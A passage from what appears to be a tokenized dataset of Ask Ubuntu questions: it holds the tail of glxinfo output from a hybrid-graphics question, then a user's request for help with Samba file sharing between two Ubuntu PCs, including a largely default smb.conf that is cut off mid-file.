gl_nv_multisample_coverage , gl_nv_multisample_filter_hint , gl_nv_occlusion_query , gl_nv_packed_depth_stencil , gl_nv_parameter_buffer_object , gl_nv_parameter_buffer_object2 , gl_nv_path_rendering , gl_nv_pixel_data_range , gl_nv_point_sprite , gl_nv_primitive_restart , gl_nv_register_combiners , gl_nv_register_combiners2 , gl_nv_shader_buffer_load , gl_nv_texgen_reflection , gl_nv_texture_barrier , gl_nv_texture_compression_vtc , gl_nv_texture_env_combine4 , gl_nv_texture_expand_normal , gl_nv_texture_lod_clamp , gl_nv_texture_multisample , gl_nv_texture_rectangle , gl_nv_texture_shader , gl_nv_texture_shader2 , gl_nv_texture_shader3 , gl_nv_transform_feedback , gl_nv_transform_feedback2 , gl_nv_vdpau_interop , gl_nv_vertex_array_range , gl_nv_vertex_array_range2 , gl_nv_vertex_buffer_unified_memory , gl_nv_vertex_program , gl_nv_vertex_program1_1 , gl_nv_vertex_program2 , gl_nv_vertex_program2_option , gl_nv_vertex_program3 , gl_nvx_conditional_render , gl_nvx_gpu_memory_info , gl_oes_depth24 , gl_oes_depth32 , gl_oes_depth_texture , gl_oes_element_index_uint , gl_oes_fbo_render_mipmap , gl_oes_get_program_binary , gl_oes_mapbuffer , gl_oes_packed_depth_stencil , gl_oes_rgb8_rgba8 , gl_oes_standard_derivatives , gl_oes_texture_3d , gl_oes_texture_float , gl_oes_texture_float_linear , gl_oes_texture_half_float , gl_oes_texture_half_float_linear , gl_oes_texture_npot , gl_oes_vertex_array_object , gl_oes_vertex_half_float , gl_sgis_generate_mipmap , gl_sgis_texture_lod , gl_sgix_depth_texture , gl_sgix_shadow , gl_sun_slice_accum 16 glx visuals visual x bf lv rg d st colorbuffer sr ax dp st accumbuffer ms cav id dep cl sp sz l ci b ro r g b a f gb bf th cl r g b a ns b eat -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- 0x021 24 tc 0 32 0 r y . 8 8 8 0 . . 4 24 0 16 16 16 16 0 0 none 0x090 24 tc 0 32 0 r y . 8 8 8 0 . . 4 24 0 16 16 16 16 0 0 none 0x091 24 tc 0 32 0 r y . 8 8 8 0 . . 4 24 0 16 16 16 16 0 0 none 0x092 24 tc 0 32 0 r y . 8 8 8 0 . . 4 24 0 16 16 16 16 0 0 none 0x093 24 tc 0 32 0 r y . 8 8 8 0 . . 4 24 0 16 16 16 16 0 0 none 0x094 24 tc 0 32 0 r y . 8 8 8 0 . . 4 24 0 16 16 16 16 0 0 none 0x095 24 tc 0 32 0 r y . 8 8 8 0 . . 4 24 0 16 16 16 16 0 0 none 0x096 24 tc 0 32 0 r y . 8 8 8 0 . . 4 24 0 16 16 16 16 0 0 none 0x097 24 tc 0 32 0 r y . 8 8 8 0 . . 4 24 0 16 16 16 16 0 0 none 0x098 24 tc 0 32 0 r y . 8 8 8 0 . . 4 24 0 16 16 16 16 0 0 none 0x099 24 tc 0 32 0 r y . 8 8 8 0 . . 4 24 0 16 16 16 16 0 0 none 0x09a 24 tc 0 32 0 r y . 8 8 8 0 . . 4 24 0 16 16 16 16 0 0 none 0x09b 24 tc 0 32 0 r y . 8 8 8 0 . . 4 24 0 16 16 16 16 0 0 none 0x09c 24 tc 0 32 0 r y . 8 8 8 0 . . 4 24 0 16 16 16 16 0 0 none 0x09d 24 tc 0 32 0 r y . 8 8 8 0 . . 4 24 0 16 16 16 16 0 0 none 0x05f 32 tc 0 32 0 r y . 8 8 8 0 . . 4 24 0 16 16 16 16 0 0 none 167 glxfbconfigs : visual x bf lv rg d st colorbuffer sr ax dp st accumbuffer ms cav id dep cl sp sz l ci b ro r g b a f gb bf th cl r g b a ns b eat -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- 0x075 24 tc 0 32 0 r y . 8 8 8 0 . . 4 24 8 16 16 16 16 0 0 none 0x076 24 tc 0 32 0 r y . 8 8 8 0 . . 4 24 8 16 16 16 16 0 0 ncon 0x077 24 tc 0 32 0 r y . 8 8 8 8 . . 4 24 8 16 16 16 16 0 0 none 0x078 24 tc 0 32 0 r y . 8 8 8 8 . . 4 24 8 16 16 16 16 0 0 ncon 0x079 24 tc 0 32 0 r . . 8 8 8 0 . . 4 24 8 16 16 16 16 0 0 none 0x07a 24 tc 0 32 0 r . . 8 8 8 0 . . 4 24 8 16 16 16 16 0 0 ncon 0x07b 24 tc 0 32 0 r . . 8 8 8 8 . . 4 24 8 16 16 16 16 0 0 none 0x07c 24 tc 0 32 0 r . . 8 8 8 8 . . 4 24 8 16 16 16 16 0 0 ncon 0x07d 32 tc 0 32 0 r y . 8 8 8 0 . . 4 24 0 16 16 16 16 0 0 none 0x07e 24 tc 0 32 0 r y . 8 8 8 0 . . 4 24 0 16 16 16 16 0 0 ncon 0x07f 24 tc 0 32 0 r y . 8 8 8 8 . . 4 24 0 16 16 16 16 0 0 none 0x080 24 tc 0 32 0 r y . 8 8 8 8 . . 4 24 0 16 16 16 16 0 0 ncon 0x081 24 tc 0 32 0 r . . 8 8 8 0 . . 4 24 0 16 16 16 16 0 0 none 0x082 24 tc 0 32 0 r . . 8 8 8 0 . . 4 24 0 16 16 16 16 0 0 ncon 0x083 24 tc 0 32 0 r . . 8 8 8 8 . . 4 24 0 16 16 16 16 0 0 none 0x084 24 tc 0 32 0 r . . 8 8 8 8 . . 4 24 0 16 16 16 16 0 0 ncon 0x085 24 tc 0 32 0 r y . 8 8 8 0 . . 4 0 0 16 16 16 16 0 0 none 0x086 24 tc 0 32 0 r y . 8 8 8 0 . . 4 0 0 16 16 16 16 0 0 ncon 0x087 24 tc 0 32 0 r y . 8 8 8 8 . . 4 0 0 16 16 16 16 0 0 none 0x088 24 tc 0 32 0 r y . 8 8 8 8 . . 4 0 0 16 16 16 16 0 0 ncon 0x089 24 tc 0 32 0 r . . 8 8 8 0 . . 4 0 0 16 16 16 16 0 0 none 0x08a 24 tc 0 32 0 r . . 8 8 8 0 . . 4 0 0 16 16 16 16 0 0 ncon 0x08b 24 tc 0 32 0 r . . 8 8 8 8 . . 4 0 0 16 16 16 16 0 0 none 0x08c 24 tc 0 32 0 r . . 8 8 8 8 . . 4 0 0 16 16 16 16 0 0 ncon 0x08d 24 tc 0 32 0 r y . 8 8 8 0 . . 4 24 0 16 16 16 16 2 1 ncon 0x08e 24 tc 0 32 0 r y . 8 8 8 0 . . 4 24 0 16 16 16 16 2 1 ncon 0x08f 24 tc 0 32 0 r y . 8 8 8 8 . . 4 24 0 16 16 16 16 2 1 ncon 0x090 24 tc 0 32 0 r y . 8 8 8 8 . . 4 24 0 16 16 16 16 2 1 ncon 0x091 24 tc 0 32 0 r y . 8 8 8 0 . . 4 24 0 16 16 16 16 4 1 ncon 0x092 24 tc 0 32 0 r y . 8 8 8 0 . . 4 24 0 16 16 16 16 4 1 ncon 0x093 24 tc 0 32 0 r y . 8 8 8 8 . . 4 24 0 16 16 16 16 4 1 ncon 0x094 24 tc 0 32 0 r y . 8 8 8 8 . . 4 24 0 16 16 16 16 4 1 ncon 0x095 24 tc 0 32 0 r . . 8 8 8 0 . . 4 24 0 16 16 16 16 2 1 ncon 0x096 24 tc 0 32 0 r . . 8 8 8 0 . . 4 24 0 16 16 16 16 2 1 ncon 0x097 24 tc 0 32 0 r . . 8 8 8 8 . . 4 24 0 16 16 16 16 2 1 ncon 0x098 24 tc 0 32 0 r . . 8 8 8 8 . . 4 24 0 16 16 16 16 2 1 ncon 0x099 24 tc 0 32 0 r . . 8 8 8 0 . . 4 24 0 16 16 16 16 4 1 ncon 0x09a 24 tc 0 32 0 r . . 8 8 8 0 . . 4 24 0 16 16 16 16 4 1 ncon 0x09b 24 tc 0 32 0 r . . 8 8 8 8 . . 4 24 0 16 16 16 16 4 1 ncon 0x09c 24 tc 0 32 0 r . . 8 8 8 8 . . 4 24 0 16 16 16 16 4 1 ncon 0x09d 24 tc 0 32 0 r y . 8 8 8 0 . . 4 24 8 16 16 16 16 2 1 ncon 0x09e 24 tc 0 32 0 r y . 8 8 8 0 . . 4 24 8 16 16 16 16 2 1 ncon 0x09f 24 tc 0 32 0 r y . 8 8 8 8 . . 4 24 8 16 16 16 16 2 1 ncon 0x0a0 24 tc 0 32 0 r y . 8 8 8 8 . . 4 24 8 16 16 16 16 2 1 ncon 0x0a1 24 tc 0 32 0 r y . 8 8 8 0 . . 4 24 8 16 16 16 16 4 1 ncon 0x0a2 24 tc 0 32 0 r y . 8 8 8 0 . . 4 24 8 16 16 16 16 4 1 ncon 0x0a3 24 tc 0 32 0 r y . 8 8 8 8 . . 4 24 8 16 16 16 16 4 1 ncon 0x0a4 24 tc 0 32 0 r y . 8 8 8 8 . . 4 24 8 16 16 16 16 4 1 ncon 0x0a5 24 tc 0 32 0 r . . 8 8 8 0 . . 4 24 8 16 16 16 16 2 1 ncon 0x0a6 24 tc 0 32 0 r . . 8 8 8 0 . . 4 24 8 16 16 16 16 2 1 ncon 0x0a7 24 tc 0 32 0 r . . 8 8 8 8 . . 4 24 8 16 16 16 16 2 1 ncon 0x0a8 24 tc 0 32 0 r . . 8 8 8 8 . . 4 24 8 16 16 16 16 2 1 ncon 0x0a9 24 tc 0 32 0 r . . 8 8 8 0 . . 4 24 8 16 16 16 16 4 1 ncon 0x0aa 24 tc 0 32 0 r . . 8 8 8 0 . . 4 24 8 16 16 16 16 4 1 ncon 0x0ab 24 tc 0 32 0 r . . 8 8 8 8 . . 4 24 8 16 16 16 16 4 1 ncon 0x0ac 24 tc 0 32 0 r . . 8 8 8 8 . . 4 24 8 16 16 16 16 4 1 ncon 0x0ad 24 tc 0 32 0 r y . 8 8 8 0 . . 4 24 8 16 16 16 16 0 0 none 0x0ae 24 tc 0 32 0 r y . 8 8 8 8 . . 4 24 8 16 16 16 16 0 0 none 0x0af 24 tc 0 32 0 r . . 8 8 8 0 . . 4 24 8 16 16 16 16 0 0 none 0x0b0 24 tc 0 32 0 r . . 8 8 8 8 . . 4 24 8 16 16 16 16 0 0 none 0x0b1 24 tc 0 32 0 r y . 8 8 8 0 . . 4 24 0 16 16 16 16 0 0 none 0x0b2 24 tc 0 32 0 r y . 8 8 8 8 . . 4 24 0 16 16 16 16 0 0 none 0x0b3 24 tc 0 32 0 r . . 8 8 8 0 . . 4 24 0 16 16 16 16 0 0 none 0x0b4 24 tc 0 32 0 r . . 8 8 8 8 . . 4 24 0 16 16 16 16 0 0 none 0x0b5 24 tc 0 32 0 r y . 8 8 8 0 . . 4 0 0 16 16 16 16 0 0 none 0x0b6 24 tc 0 32 0 r y . 8 8 8 8 . . 4 0 0 16 16 16 16 0 0 none 0x0b7 24 tc 0 32 0 r . . 8 8 8 0 . . 4 0 0 16 16 16 16 0 0 none 0x0b8 24 tc 0 32 0 r . . 8 8 8 8 . . 4 0 0 16 16 16 16 0 0 none 0x0b9 24 tc 0 32 0 r y . 8 8 8 0 . . 4 24 0 16 16 16 16 2 1 ncon 0x0ba 24 tc 0 32 0 r y . 8 8 8 8 . . 4 24 0 16 16 16 16 2 1 ncon 0x0bb 24 tc 0 32 0 r y . 8 8 8 0 . . 4 24 0 16 16 16 16 4 1 ncon 0x0bc 24 tc 0 32 0 r y . 8 8 8 8 . . 4 24 0 16 16 16 16 4 1 ncon 0x0bd 24 tc 0 32 0 r . . 8 8 8 0 . . 4 24 0 16 16 16 16 2 1 ncon 0x0be 24 tc 0 32 0 r . . 8 8 8 8 . . 4 24 0 16 16 16 16 2 1 ncon 0x0bf 24 tc 0 32 0 r . . 8 8 8 0 . . 4 24 0 16 16 16 16 4 1 ncon 0x0c0 24 tc 0 32 0 r . . 8 8 8 8 . . 4 24 0 16 16 16 16 4 1 ncon 0x0c1 24 tc 0 32 0 r y . 8 8 8 0 . . 4 24 8 16 16 16 16 2 1 ncon 0x0c2 24 tc 0 32 0 r y . 8 8 8 8 . . 4 24 8 16 16 16 16 2 1 ncon 0x0c3 24 tc 0 32 0 r y . 8 8 8 0 . . 4 24 8 16 16 16 16 4 1 ncon 0x0c4 24 tc 0 32 0 r y . 8 8 8 8 . . 4 24 8 16 16 16 16 4 1 ncon 0x0c5 24 tc 0 32 0 r . . 8 8 8 0 . . 4 24 8 16 16 16 16 2 1 ncon 0x0c6 24 tc 0 32 0 r . . 8 8 8 8 . . 4 24 8 16 16 16 16 2 1 ncon 0x0c7 24 tc 0 32 0 r . . 8 8 8 0 . . 4 24 8 16 16 16 16 4 1 ncon 0x0c8 24 tc 0 32 0 r . . 8 8 8 8 . . 4 24 8 16 16 16 16 4 1 ncon 0x0c9 24 tc 0 16 0 r y . 5 6 5 0 . . 4 16 0 16 16 16 16 0 0 ncon 0x0ca 24 tc 0 16 0 r . . 5 6 5 0 . . 4 16 0 16 16 16 16 0 0 ncon 0x0cb 24 tc 0 16 0 r y . 5 6 5 0 . . 4 24 0 16 16 16 16 0 0 ncon 0x0cc 24 tc 0 16 0 r . . 5 6 5 0 . . 4 24 0 16 16 16 16 0 0 ncon 0x0cd 24 tc 0 16 0 r y . 5 6 5 0 . . 4 24 8 16 16 16 16 0 0 ncon 0x0ce 24 tc 0 16 0 r . . 5 6 5 0 . . 4 24 8 16 16 16 16 0 0 ncon 0x0cf 24 tc 0 16 0 r y . 5 6 5 0 . . 4 0 0 16 16 16 16 0 0 ncon 0x0d0 24 tc 0 16 0 r . . 5 6 5 0 . . 4 0 0 16 16 16 16 0 0 ncon 0x0d1 24 tc 0 0 0 r . . 0 0 0 0 . . 4 16 0 16 16 16 16 0 0 ncon 0x0d2 24 tc 0 0 0 r . . 0 0 0 0 . . 4 24 0 16 16 16 16 0 0 ncon 0x0d3 24 tc 0 0 0 r . . 0 0 0 0 . . 4 24 8 16 16 16 16 0 0 ncon 0x0d4 32 tc 0 32 0 r . . 16 16 0 0 . . 4 0 0 16 16 16 16 0 0 ncon 0x0d5 24 tc 0 32 0 r . . 16 16 0 0 . . 4 0 0 16 16 16 16 0 0 ncon 0x0d6 32 tc 0 32 0 r y . 16 16 0 0 . . 4 0 0 16 16 16 16 0 0 ncon 0x0d7 24 tc 0 32 0 r y . 16 16 0 0 . . 4 0 0 16 16 16 16 0 0 ncon 0x0d8 32 tc 0 32 0 r . . 32 0 0 0 . . 4 0 0 16 16 16 16 0 0 ncon 0x0d9 24 tc 0 32 0 r . . 32 0 0 0 . . 4 0 0 16 16 16 16 0 0 ncon 0x0da 32 tc 0 32 0 r y . 32 0 0 0 . . 4 0 0 16 16 16 16 0 0 ncon 0x0db 24 tc 0 32 0 r y . 32 0 0 0 . . 4 0 0 16 16 16 16 0 0 ncon 0x0dc 24 tc 0 64 0 r . . 16 16 16 16 . . 4 0 0 16 16 16 16 0 0 ncon 0x0dd 24 tc 0 64 0 r . . 16 16 16 16 . . 4 0 0 16 16 16 16 0 0 ncon 0x0de 24 tc 0 64 0 r y . 16 16 16 16 . . 4 0 0 16 16 16 16 0 0 ncon 0x0df 24 tc 0 64 0 r y . 16 16 16 16 . . 4 0 0 16 16 16 16 0 0 ncon 0x0e0 24 tc 0 128 0 r . . 32 32 32 32 . . 4 0 0 16 16 16 16 0 0 ncon 0x0e1 24 tc 0 128 0 r . . 32 32 32 32 . . 4 0 0 16 16 16 16 0 0 ncon 0x0e2 24 tc 0 128 0 r y . 32 32 32 32 . . 4 0 0 16 16 16 16 0 0 ncon 0x0e3 24 tc 0 128 0 r y . 32 32 32 32 . . 4 0 0 16 16 16 16 0 0 ncon 0x0e4 32 tc 0 32 0 r . . 16 16 0 0 . . 4 24 0 16 16 16 16 0 0 ncon 0x0e5 24 tc 0 32 0 r . . 16 16 0 0 . . 4 24 0 16 16 16 16 0 0 ncon 0x0e6 32 tc 0 32 0 r y . 16 16 0 0 . . 4 24 0 16 16 16 16 0 0 ncon 0x0e7 24 tc 0 32 0 r y . 16 16 0 0 . . 4 24 0 16 16 16 16 0 0 ncon 0x0e8 32 tc 0 32 0 r . . 16 16 0 0 . . 4 24 8 16 16 16 16 0 0 ncon 0x0e9 24 tc 0 32 0 r . . 16 16 0 0 . . 4 24 8 16 16 16 16 0 0 ncon 0x0ea 32 tc 0 32 0 r y . 16 16 0 0 . . 4 24 8 16 16 16 16 0 0 ncon 0x0eb 24 tc 0 32 0 r y . 16 16 0 0 . . 4 24 8 16 16 16 16 0 0 ncon 0x0ec 32 tc 0 32 0 r . . 32 0 0 0 . . 4 24 0 16 16 16 16 0 0 ncon 0x0ed 24 tc 0 32 0 r . . 32 0 0 0 . . 4 24 0 16 16 16 16 0 0 ncon 0x0ee 32 tc 0 32 0 r y . 32 0 0 0 . . 4 24 0 16 16 16 16 0 0 ncon 0x0ef 24 tc 0 32 0 r y . 32 0 0 0 . . 4 24 0 16 16 16 16 0 0 ncon 0x0f0 32 tc 0 32 0 r . . 32 0 0 0 . . 4 24 8 16 16 16 16 0 0 ncon 0x0f1 24 tc 0 32 0 r . . 32 0 0 0 . . 4 24 8 16 16 16 16 0 0 ncon 0x0f2 32 tc 0 32 0 r y . 32 0 0 0 . . 4 24 8 16 16 16 16 0 0 ncon 0x0f3 24 tc 0 32 0 r y . 32 0 0 0 . . 4 24 8 16 16 16 16 0 0 ncon 0x0f4 24 tc 0 64 0 r . . 16 16 16 16 . . 4 24 0 16 16 16 16 0 0 ncon 0x0f5 24 tc 0 64 0 r . . 16 16 16 16 . . 4 24 0 16 16 16 16 0 0 ncon 0x0f6 24 tc 0 64 0 r y . 16 16 16 16 . . 4 24 0 16 16 16 16 0 0 ncon 0x0f7 24 tc 0 64 0 r y . 16 16 16 16 . . 4 24 0 16 16 16 16 0 0 ncon 0x0f8 24 tc 0 64 0 r . . 16 16 16 16 . . 4 24 8 16 16 16 16 0 0 ncon 0x0f9 24 tc 0 64 0 r . . 16 16 16 16 . . 4 24 8 16 16 16 16 0 0 ncon 0x0fa 24 tc 0 64 0 r y . 16 16 16 16 . . 4 24 8 16 16 16 16 0 0 ncon 0x0fb 24 tc 0 64 0 r y . 16 16 16 16 . . 4 24 8 16 16 16 16 0 0 ncon 0x0fc 24 tc 0 128 0 r . . 32 32 32 32 . . 4 24 0 16 16 16 16 0 0 ncon 0x0fd 24 tc 0 128 0 r . . 32 32 32 32 . . 4 24 0 16 16 16 16 0 0 ncon 0x0fe 24 tc 0 128 0 r y . 32 32 32 32 . . 4 24 0 16 16 16 16 0 0 ncon 0x0ff 24 tc 0 128 0 r y . 32 32 32 32 . . 4 24 0 16 16 16 16 0 0 ncon 0x100 24 tc 0 128 0 r . . 32 32 32 32 . . 4 24 8 16 16 16 16 0 0 ncon 0x101 24 tc 0 128 0 r . . 32 32 32 32 . . 4 24 8 16 16 16 16 0 0 ncon 0x102 24 tc 0 128 0 r y . 32 32 32 32 . . 4 24 8 16 16 16 16 0 0 ncon 0x103 24 tc 0 128 0 r y . 32 32 32 32 . . 4 24 8 16 16 16 16 0 0 ncon 0x104 24 tc 0 16 0 r . . 16 0 0 0 . . 4 0 0 16 16 16 16 0 0 ncon 0x105 24 tc 0 16 0 r . . 16 0 0 0 . . 4 0 0 16 16 16 16 0 0 ncon 0x106 24 tc 0 16 0 r y . 16 0 0 0 . . 4 0 0 16 16 16 16 0 0 ncon 0x107 24 tc 0 16 0 r y . 16 0 0 0 . . 4 0 0 16 16 16 16 0 0 ncon 0x108 24 tc 0 64 0 r . . 32 32 0 0 . . 4 0 0 16 16 16 16 0 0 ncon 0x109 24 tc 0 64 0 r . . 32 32 0 0 . . 4 0 0 16 16 16 16 0 0 ncon 0x10a 24 tc 0 64 0 r y . 32 32 0 0 . . 4 0 0 16 16 16 16 0 0 ncon 0x10b 24 tc 0 64 0 r y . 32 32 0 0 . . 4 0 0 16 16 16 16 0 0 ncon 0x10c 24 tc 0 16 0 r . . 16 0 0 0 . . 4 24 0 16 16 16 16 0 0 ncon 0x10d 24 tc 0 16 0 r . . 16 0 0 0 . . 4 24 0 16 16 16 16 0 0 ncon 0x10e 24 tc 0 16 0 r y . 16 0 0 0 . . 4 24 0 16 16 16 16 0 0 ncon 0x10f 24 tc 0 16 0 r y . 16 0 0 0 . . 4 24 0 16 16 16 16 0 0 ncon 0x110 24 tc 0 16 0 r . . 16 0 0 0 . . 4 24 8 16 16 16 16 0 0 ncon 0x111 24 tc 0 16 0 r . . 16 0 0 0 . . 4 24 8 16 16 16 16 0 0 ncon 0x112 24 tc 0 16 0 r y . 16 0 0 0 . . 4 24 8 16 16 16 16 0 0 ncon 0x113 24 tc 0 16 0 r y . 16 0 0 0 . . 4 24 8 16 16 16 16 0 0 ncon 0x114 24 tc 0 64 0 r . . 32 32 0 0 . . 4 24 0 16 16 16 16 0 0 ncon 0x115 24 tc 0 64 0 r . . 32 32 0 0 . . 4 24 0 16 16 16 16 0 0 ncon 0x116 24 tc 0 64 0 r y . 32 32 0 0 . . 4 24 0 16 16 16 16 0 0 ncon 0x117 24 tc 0 64 0 r y . 32 32 0 0 . . 4 24 0 16 16 16 16 0 0 ncon 0x118 24 tc 0 64 0 r . . 32 32 0 0 . . 4 24 8 16 16 16 16 0 0 ncon 0x119 24 tc 0 64 0 r . . 32 32 0 0 . . 4 24 8 16 16 16 16 0 0 ncon 0x11a 24 tc 0 64 0 r y . 32 32 0 0 . . 4 24 8 16 16 16 16 0 0 ncon 0x11b 24 tc 0 64 0 r y . 32 32 0 0 . . 4 24 8 16 16 16 16 0 0 ncon avilella @ magneto : ~/hybrid_graphics/hybrid-windump $ display=:8 metacity -- replace & [ 1 ] 3775 avilella @ magneto : ~/hybrid_graphics/hybrid-windump $ window manager error : unable to open x display :8 [ 1 ] + exit 1 display=:8 metacity -- replace
100790	how to enable file sharing between two pcs ?	how to enable file sharing between two ubuntu oneiric pcs . i have installed samba both machines i have changed permissions to all create guest accounts file is in home folder why cant i see shared folders in network ? samba conf file is as follows : ******************************************************** # # sample configuration file for the samba suite for debian gnu/linux . # # # this is the main samba configuration file . you should read the # smb.conf ( 5 ) manual page in order to understand the options listed # here . samba has a huge number of configurable options most of which # are not shown in this example # # some options that are often worth tuning have been included as # commented-out examples in this file . # - when such options are commented with `` ; '' , the proposed setting # differs from the default samba behaviour # - when commented with `` # '' , the proposed setting is the default # behaviour of samba but the option is considered important # enough to be mentioned here # # note : whenever you modify this file you should run the command # `` testparm '' to check that you have not made any basic syntactic # errors . # a well-established practice is to name the original file # `` smb.conf.master '' and create the `` real '' config file with # testparm -s smb.conf.master > smb.conf # this minimizes the size of the really used smb.conf file # which , according to the samba team , impacts performance # however , use this with caution if your smb.conf file contains nested # `` include '' statements . see debian bug # 483187 for a case # where using a master file is not a good idea . # # ======================= global settings ======================= [ global ] usershare owner only = false # # browsing/identification # # # # change this to the workgroup/nt-domain name your samba server will part of workgroup = workgroup # server string is the equivalent of the nt description field server string = % h server ( samba , ubuntu ) # windows internet name serving support section : # wins support - tells the nmbd component of samba to enable its wins server # wins support = no wins support = no # wins server - tells the nmbd components of samba to be a wins client # note : samba can be either a wins server , or a wins client , but not both ; wins server = w.x.y.z # this will prevent nmbd to search for netbios names through dns . dns proxy = no # what naming service and in what order should we use to resolve host names # to ip addresses ; name resolve order = lmhosts host wins bcast # # # # networking # # # # # the specific set of interfaces / networks to bind to # this can be either the interface name or an ip address/netmask ; # interface names are normally preferred ; interfaces = 127.0.0.0/8 eth0 # only bind to the named interfaces and/or networks ; you must use the # 'interfaces ' option above to use this . # it is recommended that you enable this feature if your samba machine is # not protected by a firewall or is a firewall itself . however , this # option can not handle dynamic or non-broadcast interfaces correctly . ; bind interfaces only = yes # # # # debugging/accounting # # # # # this tells samba to use a separate log file for each machine # that connects log file = /var/log/samba/log. % m # cap the size of the individual log files ( in kib ) . max log size = 1000 # if you want samba to only log through syslog then set the following # parameter to 'yes ' . # syslog only = no # we want samba to log a minimum amount of information to syslog . everything # should go to /var/log/samba/log . { smbd , nmbd } instead . if you want to log # through syslog you should set the following parameter to something higher . syslog = 0 # do something sensible when samba crashes : mail the admin a backtrace panic action = /usr/share/samba/panic-action % d # # # # # # # authentication # # # # # # # # `` security = user '' is always a good idea . this will require a unix account # in this server for every user accessing the server . see # /usr/share/doc/samba-doc/htmldocs/samba3-howto/servertype.html # in the samba-doc package for details . # security = user # you may wish to use password encryption . see the section on # 'encrypt passwords ' in the smb.conf ( 5 ) manpage before enabling . encrypt passwords = true # if you are using encrypted passwords , samba will need to know what # password database type you are using . passdb backend = tdbsam obey pam restrictions = yes # this boolean parameter controls whether samba attempts to sync the unix # password with the smb password when the encrypted smb password in the # passdb is changed . unix password sync = yes # for unix password sync to work on a debian gnu/linux system , the following # parameters must be set ( thanks to ian kahan for # sending the correct chat script for the passwd program in debian sarge ) . passwd program = /usr/bin/passwd % u passwd chat = *enter\snew\s*\spassword : * % n\n *retype\snew\s*\spassword : * % n\n *password\supdated\ssuccessfully* . # this boolean controls whether pam will be used for password changes # when requested by an smb client instead of the program listed in # 'passwd program ' . the default is 'no ' . pam password change = yes # this option controls how unsuccessful authentication attempts are mapped # to anonymous connections map to guest = bad user # # # # # # # # # # domains # # # # # # # # # # # # is this machine able to authenticate users . both pdc and bdc # must have this setting enabled . if you are the bdc you must # change the 'domain master ' setting to no # ; domain logons = yes # # the following setting only takes effect if 'domain logons ' is set # it specifies the location of the user 's profile directory # from the client point of view ) # the following required a [ profiles ] share to be setup on the # samba server ( see below ) ; logon path = \\ % n\profiles\ % u # another common choice is storing the profile in the user 's home directory # ( this is samba 's default ) # logon path = \\ % n\ % u\profile # the following setting only takes effect if 'domain logons ' is set # it specifies the location of a user 's home directory ( from the client # point of view ) ; logon drive = h : # logon home = \\ % n\ % u # the following setting only takes effect if 'domain logons ' is set # it specifies the script to run during logon . the script must be stored # in the [ netlogon ] share # note : must be store in 'dos ' file format convention ; logon script = logon.cmd # this allows unix users to be created on the domain controller via the samr # rpc pipe . the example command creates a user account with a disabled unix # password ; please adapt to your needs ; add user script = /usr/sbin/adduser -- quiet -- disabled-password -- gecos `` '' % u # this allows machine accounts to be created on the domain controller via the # samr rpc pipe . # the following assumes a `` machines '' group exists on the system ; add machine script = /usr/sbin/useradd -g machines -c `` % u machine account '' -d /var/lib/samba -s /bin/false % u # this allows unix groups to be created on the domain controller via the samr # rpc pipe . ; add group script = /usr/sbin/addgroup -- force-badname % g # # # # # # # # # # printing # # # # # # # # # # # if you want to automatically load your printer list rather # than setting them up individually then you 'll need this # load printers = yes # lpr ( ng ) printing . you may wish to override the location of the # printcap file ; printing = bsd ; printcap name = /etc/printcap # cups printing . see also the cupsaddsmb ( 8 ) manpage in the # cupsys-client package . ; printing = cups ; printcap name = cups # # # # # # # # # # # # misc # # # # # # # # # # # # # using the following line enables you to customise your configuration # on a per machine basis . the % m gets replaced with the netbios name # of the machine that is connecting ; include = /home/samba/etc/smb.conf. % m # most people will find that this option gives better performance . # see smb.conf ( 5 ) and /usr/share/doc/samba-doc/htmldocs/samba3-howto/speed.html # for details # you may want to add the following on a linux system : # so_rcvbuf=8192 so_sndbuf=8192 # socket options = tcp_nodelay # the following parameter is useful only if you have the linpopup package # installed . the samba maintainer and the linpopup maintainer are # working to ease installation and configuration of linpopup and samba . ; message command = /bin/sh -c '/usr/bin/linpopup `` % f '' `` % m '' % s ; rm % s ' & # domain master specifies samba to be the domain master browser . if this # machine will be configured as a bdc ( a secondary logon server ) , you # must set this to 'no ' ; otherwise , the default behavior is recommended . # domain master = auto # some defaults for winbind ( make sure you 're not using the ranges # for something else . ) ; idmap uid = 10000-20000 ; idmap gid = 10000-20000 ; template shell = /bin/bash # the following was the default behaviour in sarge , # but samba upstream reverted the default because it might induce # performance issues in large organizations . # see debian bug # 368251 for some of the consequences of *not* # having this setting and smb.conf ( 5 ) for details . ; winbind enum groups = yes ; winbind enum users = yes # setup usershare options to enable non-root users to share folders # with the net usershare command . # maximum number of usershare . 0 ( default ) means that usershare is disabled . ; usershare max shares = 100 # allow users who 've been granted usershare privileges to create # public shares , not just authenticated ones usershare allow guests = yes # ======================= share definitions ======================= # un-comment the following ( and tweak the other settings below to suit ) # to enable the default home directory shares . this will share each # user 's home director as \\server\username ; [ homes ] ; comment = home directories ; browseable = no # by default , the home directories are exported read-only . change the # next parameter to 'no ' if you want to be able to write to them . ; read only = yes # file creation mask is set to 0700 for security reasons . if you want to # create files with group=rw permissions , set next parameter to 0775. ; create mask = 0700 # directory creation mask is set to 0700 for security reasons . if you want to # create dirs . with group=rw permissions , set next parameter to 0775. ; directory mask = 0700 # by default , \\server\username shares can be connected to by anyone # with access to the samba server . un-comment the following parameter # to make sure that only `` username '' can connect to \\server\username # the following parameter makes sure that only `` username '' can connect # # this might need tweaking when using external authentication schemes ; valid users = % s # un-comment the following and create the netlogon directory for domain logons # ( you need to configure samba to act as a domain controller too . ) ; [ netlogon ] ; comment = network logon service ; path = /home/samba/netlogon ; guest ok = yes ; read only = yes # un-comment the following and create the profiles directory to store # users profiles ( see the `` logon path '' option above ) # ( you need to configure samba to act as a domain controller too . ) # the path below should be writable by all users so that their # profile directory may be created the first time they log on ; [ profiles ] ; comment = users profiles ; path = /home/samba/profiles ; guest ok = no ; browseable = no ; create mask = 0600 ; directory mask = 0700 [ printers ] comment = all printers browseable = no path = /var/spool/samba printable = yes guest ok = no read only = yes create mask = 0700 # windows clients look for this share name as a source of downloadable # printer drivers [ print $ ] comment = printer drivers path = /var/lib/samba/printers browseable = yes read only = yes guest ok = no # uncomment to allow remote administration of windows print drivers . # you may need to replace 'lpadmin ' with the name of the group your # admin users are members of . # please note that you also need to set appropriate unix permissions # to the drivers directory for these users to have write rights in it ; write list = root , @ lpadmin # a sample share for sharing your cd-rom with others . ; [ cdrom ] ; comment = samba server 's cd-rom ; read only = yes ; locking = no ; path = 